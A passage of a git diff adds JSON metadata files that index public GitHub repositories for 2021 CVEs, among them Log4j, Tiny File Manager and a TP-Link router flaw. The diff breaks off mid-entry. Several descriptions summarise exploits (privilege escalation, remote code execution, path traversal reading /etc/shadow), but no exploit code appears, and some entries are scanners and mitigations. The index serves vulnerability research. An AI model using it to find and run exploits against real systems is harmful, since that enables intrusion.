+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130473605?v=4",
+ "html_url": "https:\/\/github.com\/deeexcee-io"
+ },
+ "html_url": "https:\/\/github.com\/deeexcee-io\/CVE-2021-44731-snap-confine-SUID",
+ "description": "Local Privilege Escalation Exploit for CVE-2021-44731",
+ "fork": false,
+ "created_at": "2023-07-09T10:06:29Z",
+ "updated_at": "2024-01-26T07:17:21Z",
+ "pushed_at": "2023-07-10T08:28:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44733.json b/2021/CVE-2021-44733.json
new file mode 100644
index 0000000000..ef7fd64102
--- /dev/null
+++ b/2021/CVE-2021-44733.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 441255365,
+ "name": "optee-qemu",
+ "full_name": "pjlantz\/optee-qemu",
+ "owner": {
+ "login": "pjlantz",
+ "id": 197917,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/197917?v=4",
+ "html_url": "https:\/\/github.com\/pjlantz"
+ },
+ "html_url": "https:\/\/github.com\/pjlantz\/optee-qemu",
+ "description": "Environment with vulnerable kernel for exploitation of the TEE driver (CVE-2021-44733)",
+ "fork": false,
+ "created_at": "2021-12-23T17:45:35Z",
+ "updated_at": "2024-04-17T06:23:32Z",
+ "pushed_at": "2021-12-28T07:57:13Z",
+ "stargazers_count": 74,
+ "watchers_count": 74,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 74,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44790.json b/2021/CVE-2021-44790.json
new file mode 100644
index 0000000000..0f1e11eb18
--- /dev/null
+++ b/2021/CVE-2021-44790.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 727568274,
+ "name": "-CVE-2021-44790",
+ "full_name": "nuPacaChi\/-CVE-2021-44790",
+ "owner": {
+ "login": "nuPacaChi",
+ "id": 127914517,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127914517?v=4",
+ "html_url": "https:\/\/github.com\/nuPacaChi"
+ },
+ "html_url": "https:\/\/github.com\/nuPacaChi\/-CVE-2021-44790",
+ "description": "Thực nghiệm CVE-2021-44790",
+ "fork": false,
+ "created_at": "2023-12-05T05:54:47Z",
+ "updated_at": "2024-06-24T12:07:35Z",
+ "pushed_at": "2023-12-05T17:08:39Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44827.json b/2021/CVE-2021-44827.json
new file mode 100644
index 0000000000..6b733c0368
--- /dev/null
+++ b/2021/CVE-2021-44827.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 437843261,
+ "name": "CVE-2021-44827",
+ "full_name": "full-disclosure\/CVE-2021-44827",
+ "owner": {
+ "login": "full-disclosure",
+ "id": 62108425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62108425?v=4",
+ "html_url": "https:\/\/github.com\/full-disclosure"
+ },
+ "html_url": "https:\/\/github.com\/full-disclosure\/CVE-2021-44827",
+ "description": "A PoC for CVE-2021-44827 - authenticated remote code execution in Tp-link Archer C20i",
+ "fork": false,
+ "created_at": "2021-12-13T11:17:12Z",
+ "updated_at": "2022-03-29T07:23:25Z",
+ "pushed_at": "2022-03-02T16:36:54Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44832.json b/2021/CVE-2021-44832.json
new file mode 100644
index 0000000000..a28174324d
--- /dev/null
+++ b/2021/CVE-2021-44832.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 442699680,
+ "name": "log4j_RCE_CVE-2021-44832",
+ "full_name": "cckuailong\/log4j_RCE_CVE-2021-44832",
+ "owner": {
+ "login": "cckuailong",
+ "id": 10824150,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10824150?v=4",
+ "html_url": "https:\/\/github.com\/cckuailong"
+ },
+ "html_url": "https:\/\/github.com\/cckuailong\/log4j_RCE_CVE-2021-44832",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-29T07:50:05Z",
+ "updated_at": "2022-02-11T09:28:41Z",
+ "pushed_at": "2021-12-29T07:54:47Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 442707396,
+ "name": "log4j-scanner",
+ "full_name": "name\/log4j-scanner",
+ "owner": {
+ "login": "name",
+ "id": 39627038,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39627038?v=4",
+ "html_url": "https:\/\/github.com\/name"
+ },
+ "html_url": "https:\/\/github.com\/name\/log4j-scanner",
+ "description": "Discover Log4Shell vulnerability [CVE-2021-44832]",
+ "fork": false,
+ "created_at": "2021-12-29T08:22:41Z",
+ "updated_at": "2024-05-29T20:55:38Z",
+ "pushed_at": "2023-09-15T13:46:33Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44852.json b/2021/CVE-2021-44852.json
new file mode 100644
index 0000000000..6823e97c68
--- /dev/null
+++ b/2021/CVE-2021-44852.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 617294533,
+ "name": "CVE-2021-44852",
+ "full_name": "CrackerCat\/CVE-2021-44852",
+ "owner": {
+ "login": "CrackerCat",
+ "id": 17995064,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4",
+ "html_url": "https:\/\/github.com\/CrackerCat"
+ },
+ "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2021-44852",
+ "description": "An issue was discovered in BS_RCIO64.sys in Biostar RACING GT Evo 2.1.1905.1700. A low-integrity process can open the driver's device object and issue IOCTLs to read or write to arbitrary physical memory locations (or call an arbitrary address), leading to execution of arbitrary code. This is associated with 0x226040, 0x226044, and 0x226000.",
+ "fork": false,
+ "created_at": "2023-03-22T04:47:54Z",
+ "updated_at": "2023-11-16T14:20:25Z",
+ "pushed_at": "2023-03-22T04:13:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44906.json b/2021/CVE-2021-44906.json
new file mode 100644
index 0000000000..fe1b7e5067
--- /dev/null
+++ b/2021/CVE-2021-44906.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 699409932,
+ "name": "CVE-2021-44906",
+ "full_name": "nevermoe\/CVE-2021-44906",
+ "owner": {
+ "login": "nevermoe",
+ "id": 5752114,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5752114?v=4",
+ "html_url": "https:\/\/github.com\/nevermoe"
+ },
+ "html_url": "https:\/\/github.com\/nevermoe\/CVE-2021-44906",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-02T15:20:35Z",
+ "updated_at": "2023-10-02T15:22:00Z",
+ "pushed_at": "2023-10-02T15:58:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44909.json b/2021/CVE-2021-44909.json
new file mode 100644
index 0000000000..b66719fc55
--- /dev/null
+++ b/2021/CVE-2021-44909.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 705463141,
+ "name": "CVE-2021-44909",
+ "full_name": "g1thub3r1st4\/CVE-2021-44909",
+ "owner": {
+ "login": "g1thub3r1st4",
+ "id": 141500233,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141500233?v=4",
+ "html_url": "https:\/\/github.com\/g1thub3r1st4"
+ },
+ "html_url": "https:\/\/github.com\/g1thub3r1st4\/CVE-2021-44909",
+ "description": "orangescrum 1.8.0 - Remote Command Execution RCE (unauthenticated)",
+ "fork": false,
+ "created_at": "2023-10-16T03:54:23Z",
+ "updated_at": "2023-10-16T07:47:24Z",
+ "pushed_at": "2023-10-16T04:38:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44910.json b/2021/CVE-2021-44910.json
new file mode 100644
index 0000000000..616f250adf
--- /dev/null
+++ b/2021/CVE-2021-44910.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 669553669,
+ "name": "CVE-2021-44910_SpringBlade",
+ "full_name": "dockererr\/CVE-2021-44910_SpringBlade",
+ "owner": {
+ "login": "dockererr",
+ "id": 86119333,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86119333?v=4",
+ "html_url": "https:\/\/github.com\/dockererr"
+ },
+ "html_url": "https:\/\/github.com\/dockererr\/CVE-2021-44910_SpringBlade",
+ "description": "在21年,SpringBlade框架曾发现一个JWT认证的漏洞。尽管我们搜索了许多基于原理的扫描工具,但没有找到能够支持这个漏洞的工具。可能是因为这个漏洞相对冷门而不被广泛关注。",
+ "fork": false,
+ "created_at": "2023-07-22T16:48:24Z",
+ "updated_at": "2024-06-22T02:47:41Z",
+ "pushed_at": "2023-07-22T16:52:21Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45007.json b/2021/CVE-2021-45007.json
new file mode 100644
index 0000000000..5e5ae31463
--- /dev/null
+++ b/2021/CVE-2021-45007.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 461231807,
+ "name": "CVE-2021-45007",
+ "full_name": "AS4mir\/CVE-2021-45007",
+ "owner": {
+ "login": "AS4mir",
+ "id": 65978029,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65978029?v=4",
+ "html_url": "https:\/\/github.com\/AS4mir"
+ },
+ "html_url": "https:\/\/github.com\/AS4mir\/CVE-2021-45007",
+ "description": "Cross-Site Request Forgery",
+ "fork": false,
+ "created_at": "2022-02-19T15:28:59Z",
+ "updated_at": "2023-01-24T14:33:34Z",
+ "pushed_at": "2022-03-16T14:36:36Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45008.json b/2021/CVE-2021-45008.json
new file mode 100644
index 0000000000..6f11ae6fde
--- /dev/null
+++ b/2021/CVE-2021-45008.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 461780034,
+ "name": "CVE-2021-45008",
+ "full_name": "AS4mir\/CVE-2021-45008",
+ "owner": {
+ "login": "AS4mir",
+ "id": 65978029,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65978029?v=4",
+ "html_url": "https:\/\/github.com\/AS4mir"
+ },
+ "html_url": "https:\/\/github.com\/AS4mir\/CVE-2021-45008",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-21T09:00:38Z",
+ "updated_at": "2023-01-24T14:33:35Z",
+ "pushed_at": "2022-03-16T14:38:24Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45010.json b/2021/CVE-2021-45010.json
new file mode 100644
index 0000000000..5c8d0f1ced
--- /dev/null
+++ b/2021/CVE-2021-45010.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 471389764,
+ "name": "CVE-2021-45010-TinyFileManager-Exploit",
+ "full_name": "febinrev\/CVE-2021-45010-TinyFileManager-Exploit",
+ "owner": {
+ "login": "febinrev",
+ "id": 52229330,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4",
+ "html_url": "https:\/\/github.com\/febinrev"
+ },
+ "html_url": "https:\/\/github.com\/febinrev\/CVE-2021-45010-TinyFileManager-Exploit",
+ "description": "A Path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager Project’s Tiny File Manager <= 2.4.3 allows remote attackers with valid user accounts to upload malicious PHP files to the webroot and achieve code execution on the target server.",
+ "fork": false,
+ "created_at": "2022-03-18T14:00:03Z",
+ "updated_at": "2022-03-18T18:35:40Z",
+ "pushed_at": "2022-03-18T18:35:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 580199819,
+ "name": "CVE-2021-45010",
+ "full_name": "BKreisel\/CVE-2021-45010",
+ "owner": {
+ "login": "BKreisel",
+ "id": 1513073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1513073?v=4",
+ "html_url": "https:\/\/github.com\/BKreisel"
+ },
+ "html_url": "https:\/\/github.com\/BKreisel\/CVE-2021-45010",
+ "description": "🐍 Python Exploit for CVE-2021-45010",
+ "fork": false,
+ "created_at": "2022-12-20T00:47:30Z",
+ "updated_at": "2023-01-04T16:22:32Z",
+ "pushed_at": "2022-12-20T03:58:37Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 613526720,
+ "name": "CVE-2021-45010",
+ "full_name": "Syd-SydneyJr\/CVE-2021-45010",
+ "owner": {
+ "login": "Syd-SydneyJr",
+ "id": 127783310,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127783310?v=4",
+ "html_url": "https:\/\/github.com\/Syd-SydneyJr"
+ },
+ "html_url": "https:\/\/github.com\/Syd-SydneyJr\/CVE-2021-45010",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-13T18:40:02Z",
+ "updated_at": "2023-03-14T00:32:44Z",
+ "pushed_at": "2023-03-13T18:41:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45026.json b/2021/CVE-2021-45026.json
new file mode 100644
index 0000000000..1aa9e93350
--- /dev/null
+++ b/2021/CVE-2021-45026.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 436996683,
+ "name": "Zena-CVE-2021-45026",
+ "full_name": "JetP1ane\/Zena-CVE-2021-45026",
+ "owner": {
+ "login": "JetP1ane",
+ "id": 85408475,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85408475?v=4",
+ "html_url": "https:\/\/github.com\/JetP1ane"
+ },
+ "html_url": "https:\/\/github.com\/JetP1ane\/Zena-CVE-2021-45026",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-10T13:55:33Z",
+ "updated_at": "2024-04-10T16:51:00Z",
+ "pushed_at": "2022-06-29T14:48:44Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45041.json b/2021/CVE-2021-45041.json
new file mode 100644
index 0000000000..25d55dd238
--- /dev/null
+++ b/2021/CVE-2021-45041.json
@@ -0,0 +1,40 @@
+[
+ {
+ "id": 442254323,
+ "name": "CVE-2021-45041",
+ "full_name": "manuelz120\/CVE-2021-45041",
+ "owner": {
+ "login": "manuelz120",
+ "id": 1948316,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1948316?v=4",
+ "html_url": "https:\/\/github.com\/manuelz120"
+ },
+ "html_url": "https:\/\/github.com\/manuelz120\/CVE-2021-45041",
+ "description": "PoC for CVE-2021-45041",
+ "fork": false,
+ "created_at": "2021-12-27T19:29:34Z",
+ "updated_at": "2022-11-09T18:14:54Z",
+ "pushed_at": "2021-12-27T21:07:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "owasp-top-10",
+ "python",
+ "security",
+ "sql-injection",
+ "sql-injection-proof",
+ "suitecrm"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45043.json b/2021/CVE-2021-45043.json
new file mode 100644
index 0000000000..2a26c638c8
--- /dev/null
+++ b/2021/CVE-2021-45043.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 438670323,
+ "name": "cve-2021-45043",
+ "full_name": "crypt0g30rgy\/cve-2021-45043",
+ "owner": {
+ "login": "crypt0g30rgy",
+ "id": 72516596,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72516596?v=4",
+ "html_url": "https:\/\/github.com\/crypt0g30rgy"
+ },
+ "html_url": "https:\/\/github.com\/crypt0g30rgy\/cve-2021-45043",
+ "description": "HD-Network Real-time Monitoring System 2.0 allows ..\/ directory traversal to read \/etc\/shadow via the \/language\/lang s_Language parameter.",
+ "fork": false,
+ "created_at": "2021-12-15T15:01:31Z",
+ "updated_at": "2023-09-28T11:34:09Z",
+ "pushed_at": "2021-12-15T15:07:00Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45046.json b/2021/CVE-2021-45046.json
new file mode 100644
index 0000000000..07ca61fe36
--- /dev/null
+++ b/2021/CVE-2021-45046.json
@@ -0,0 +1,309 @@
+[
+ {
+ "id": 438510625,
+ "name": "Log4j_CVE-2021-45046",
+ "full_name": "cckuailong\/Log4j_CVE-2021-45046",
+ "owner": {
+ "login": "cckuailong",
+ "id": 10824150,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10824150?v=4",
+ "html_url": "https:\/\/github.com\/cckuailong"
+ },
+ "html_url": "https:\/\/github.com\/cckuailong\/Log4j_CVE-2021-45046",
+ "description": "Log4j 2.15.0 Privilege Escalation -- CVE-2021-45046",
+ "fork": false,
+ "created_at": "2021-12-15T05:48:53Z",
+ "updated_at": "2024-05-15T22:53:52Z",
+ "pushed_at": "2021-12-23T10:57:19Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 438561965,
+ "name": "CVE-2021-45046-Info",
+ "full_name": "BobTheShoplifter\/CVE-2021-45046-Info",
+ "owner": {
+ "login": "BobTheShoplifter",
+ "id": 22559547,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22559547?v=4",
+ "html_url": "https:\/\/github.com\/BobTheShoplifter"
+ },
+ "html_url": "https:\/\/github.com\/BobTheShoplifter\/CVE-2021-45046-Info",
+ "description": "Oh no another one",
+ "fork": false,
+ "created_at": "2021-12-15T09:01:37Z",
+ "updated_at": "2023-09-28T11:34:08Z",
+ "pushed_at": "2022-04-07T19:07:20Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438697866,
+ "name": "CVE-2021-45046",
+ "full_name": "tejas-nagchandi\/CVE-2021-45046",
+ "owner": {
+ "login": "tejas-nagchandi",
+ "id": 76960497,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76960497?v=4",
+ "html_url": "https:\/\/github.com\/tejas-nagchandi"
+ },
+ "html_url": "https:\/\/github.com\/tejas-nagchandi\/CVE-2021-45046",
+ "description": "Replicating CVE-2021-45046",
+ "fork": false,
+ "created_at": "2021-12-15T16:28:11Z",
+ "updated_at": "2021-12-16T07:17:16Z",
+ "pushed_at": "2021-12-16T07:13:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-45046",
+ "log4j2"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438746535,
+ "name": "log4j2-CVE-2021-45046",
+ "full_name": "pravin-pp\/log4j2-CVE-2021-45046",
+ "owner": {
+ "login": "pravin-pp",
+ "id": 12995541,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12995541?v=4",
+ "html_url": "https:\/\/github.com\/pravin-pp"
+ },
+ "html_url": "https:\/\/github.com\/pravin-pp\/log4j2-CVE-2021-45046",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-15T19:19:52Z",
+ "updated_at": "2021-12-15T19:42:14Z",
+ "pushed_at": "2021-12-15T19:42:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 439085356,
+ "name": "log4j-samples",
+ "full_name": "mergebase\/log4j-samples",
+ "owner": {
+ "login": "mergebase",
+ "id": 73667397,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73667397?v=4",
+ "html_url": "https:\/\/github.com\/mergebase"
+ },
+ "html_url": "https:\/\/github.com\/mergebase\/log4j-samples",
+ "description": "Public testing data. Samples of log4j library versions to help log4j scanners \/ detectors improve their accuracy for detecting CVE-2021-45046 and CVE-2021-44228. TAG_TESTING, OWNER_KEN, DC_PUBLIC",
+ "fork": false,
+ "created_at": "2021-12-16T18:12:29Z",
+ "updated_at": "2023-09-11T19:22:43Z",
+ "pushed_at": "2021-12-30T05:15:54Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "cve-2021-45046",
+ "log4j"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 439433330,
+ "name": "log4jjndilookupremove",
+ "full_name": "lukepasek\/log4jjndilookupremove",
+ "owner": {
+ "login": "lukepasek",
+ "id": 6756387,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6756387?v=4",
+ "html_url": "https:\/\/github.com\/lukepasek"
+ },
+ "html_url": "https:\/\/github.com\/lukepasek\/log4jjndilookupremove",
+ "description": "A simple script to remove Log4J JndiLookup.class from jars in a given directory, to temporarily protect from CVE-2021-45046 and CVE-2021-44228.",
+ "fork": false,
+ "created_at": "2021-12-17T18:59:16Z",
+ "updated_at": "2022-01-04T14:24:23Z",
+ "pushed_at": "2022-01-04T14:24:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439600548,
+ "name": "cve-2021-45046",
+ "full_name": "ludy-dev\/cve-2021-45046",
+ "owner": {
+ "login": "ludy-dev",
+ "id": 70466565,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70466565?v=4",
+ "html_url": "https:\/\/github.com\/ludy-dev"
+ },
+ "html_url": "https:\/\/github.com\/ludy-dev\/cve-2021-45046",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-18T11:43:56Z",
+ "updated_at": "2024-04-12T17:17:07Z",
+ "pushed_at": "2021-12-18T11:53:12Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 440156597,
+ "name": "log4j2_vul_local_scanner",
+ "full_name": "lijiejie\/log4j2_vul_local_scanner",
+ "owner": {
+ "login": "lijiejie",
+ "id": 3167953,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3167953?v=4",
+ "html_url": "https:\/\/github.com\/lijiejie"
+ },
+ "html_url": "https:\/\/github.com\/lijiejie\/log4j2_vul_local_scanner",
+ "description": "Log4j 漏洞本地检测脚本。 Scan all java processes on your host to check whether it's affected by log4j2 remote code execution vulnerability (CVE-2021-45046)",
+ "fork": false,
+ "created_at": "2021-12-20T12:07:41Z",
+ "updated_at": "2024-06-21T00:09:43Z",
+ "pushed_at": "2021-12-22T06:24:42Z",
+ "stargazers_count": 85,
+ "watchers_count": 85,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 85,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 441418197,
+ "name": "Log4Shell-Sandbox-Signature",
+ "full_name": "CaptanMoss\/Log4Shell-Sandbox-Signature",
+ "owner": {
+ "login": "CaptanMoss",
+ "id": 10811344,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10811344?v=4",
+ "html_url": "https:\/\/github.com\/CaptanMoss"
+ },
+ "html_url": "https:\/\/github.com\/CaptanMoss\/Log4Shell-Sandbox-Signature",
+ "description": "Log4Shell(CVE-2021-45046) Sandbox Signature",
+ "fork": false,
+ "created_at": "2021-12-24T09:02:55Z",
+ "updated_at": "2021-12-26T19:51:57Z",
+ "pushed_at": "2021-12-26T19:51:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
